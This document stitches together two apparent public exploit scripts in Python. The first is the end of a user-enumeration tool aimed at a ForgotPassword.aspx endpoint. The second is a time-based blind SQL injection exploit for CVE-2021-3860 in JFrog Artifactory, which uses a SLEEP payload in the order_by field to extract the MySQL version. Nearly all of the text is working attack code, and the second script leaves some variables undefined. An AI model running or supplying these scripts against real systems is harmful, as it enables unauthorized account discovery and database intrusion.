sys.exit(1)
valid_users = []
bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"
enumerate_txt = "This User ID/Email ID is not registered."
for index, user in enumerate(users):
progress = (index + 1) / len(users) * 100
print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")
data = {"UserId": user}
response = requests.post(
f"{url}{bypass_dir}",
json=data,
headers={"Content-Type": "application/json; charset=utf-8"}
)
if response.status_code == 200:
response_data = response.json()
if enumerate_txt not in response_data.get('d', {}).get('message', ''):
valid_users.append(user)
print("\nFinished processing users.")
print(f"Valid Users Found: {len(valid_users)}")
for user in valid_users:
print(user)
if __name__ == "__main__":
main()
# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date:
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860
import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user. there must be populated data in the system. a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below
warnings.simplefilter('ignore',InsecureRequestWarning)
session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint
pos = 1
# cookies = Replace this with captured cookies from the above endpoint
while True:
for i in string.digits + '.':
data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
start = time.time()
r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
request_time = time.time() - start
if request_time > 5:
version += i
pos += 1
stdout.write(i)
stdout.flush()
break
if len(version) >= 6:
stdout.write("\n")
print(f"Version found: MySQL {version}")
exit(0)